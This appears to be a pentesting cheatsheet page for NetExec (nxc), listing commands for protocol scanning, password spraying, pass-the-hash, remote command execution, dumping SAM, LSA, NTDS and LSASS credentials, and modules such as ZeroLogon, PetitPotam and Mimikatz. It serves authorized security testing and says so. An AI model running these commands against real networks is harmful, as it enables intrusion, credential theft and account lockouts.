Last reviewed

Quick Reference

Swiss army knife for pentesting networks. NetExec (nxc) is the actively maintained fork of CrackMapExec; the original cme binary is end-of-life. Install: pipx install git+https://github.com/Pennyw0rth/NetExec.

Authorized Testing Only

NetExec is highly intrusive — it triggers EDR, generates noisy logs, and can lock out accounts during password spraying. Use only against systems you have explicit written authorization to test. Respect lockout policies before running with --continue-on-success.

Migrating from CrackMapExec

All commands below use nxc. Legacy cme scripts are largely backward-compatible, but new modules and protocol support (LDAP, MSSQL, FTP, NFS, WinRM, RDP) ship faster in NetExec. The database CLI is now nxcdb.

MITRE ATT&CK Coverage

T1110.001 T1110.003 T1021.002 T1021.006 T1003.001 T1003.002 T1135

🔌 Protocols

SMBnxc smb 192.168.1.0/24
WinRMnxc winrm 192.168.1.10
LDAPnxc ldap 192.168.1.10
MSSQLnxc mssql 192.168.1.10
SSHnxc ssh 192.168.1.0/24
RDPnxc rdp 192.168.1.10
FTPnxc ftp 192.168.1.10

🔐 Authentication

Domain usernxc smb IP -u user -p pass -d DOMAIN
Local usernxc smb IP -u user -p pass --local-auth
Pass the Hashnxc smb IP -u user -H NTLM_HASH
Kerberosnxc smb IP -k
Null sessionnxc smb IP -u '' -p ''
User listnxc smb IP -u users.txt -p pass
Pass listnxc smb IP -u user -p passwords.txt

📊 SMB Enumeration

List shares--shares
List users--users
List groups--groups
Logged on users--loggedon-users
Sessions--sessions
Password policy--pass-pol
RID brute--rid-brute
Computers--computers

💻 Command Execution

CMD-x "whoami"
PowerShell-X "Get-Process"
Method: ATExec--exec-method atexec
Method: WMI--exec-method wmiexec
Method: SMBExec--exec-method smbexec
WinRM execnxc winrm IP -u user -p pass -x "whoami"

🔑 Credential Dumping

SAM hashes--sam
LSA secrets--lsa
NTDS.dit--ntds
NTDS VSS method--ntds vss
LSASS dump-M lsassy
DPAPI-M dpapi_secrets

🧩 Useful Modules

List modulesnxc smb -L
Module infonxc smb -M module --options
Spider shares-M spider_plus
PetitPotam-M petitpotam
ZeroLogon-M zerologon
GPP password-M gpp_password
Mimikatz-M mimikatz
Web delivery-M web_delivery

🕷️ Share Spidering

Spider specific share-M spider_plus -o SHARE=C$
Search for files--spider C$ --pattern *.kdbx
Read file content--spider C$ --content --pattern flag.txt
Get file--get-file \\share\\file local_file
Put file--put-file local \\share\\file

💾 Database

Enter DB modenxcdb
List hostshosts
List credscreds
Export dataexport creds csv output.csv

🎯 Common Workflows

Network Discovery

nxc smb 192.168.1.0/24

Password Spray

nxc smb IP -u users.txt -p 'Password1' --continue-on-success

Dump Domain Hashes

nxc smb DC_IP -u admin -p pass --ntds

Find Local Admin

nxc smb 192.168.1.0/24 -u user -H hash --local-auth

Related Topics

← All Cheatsheets

Browse all quick reference guides

Lateral Movement

Moving through networks

SMB Enumeration

SMB enumeration techniques

Impacket Cheatsheet

Python network tools

Related Tools

Use the interactive toolset as a nearby operator companion while working through this guide.

Interactive Tool

Nmap Builder

Move from copy-paste reference to tailored scan generation when you need a command that matches the target and engagement rules.
Interactive Tool

Encoder / Decoder

Translate payloads, tokens, and encoded strings while working through web, API, and post-exploitation quick references.
Interactive Tool

Payload Builder

Generate payload variants that complement the static cheatsheets when you need something engagement-specific.
Interactive Tool

Port Reference

Keep service context next to command snippets so you can move faster from notes to real-world triage and exploitation.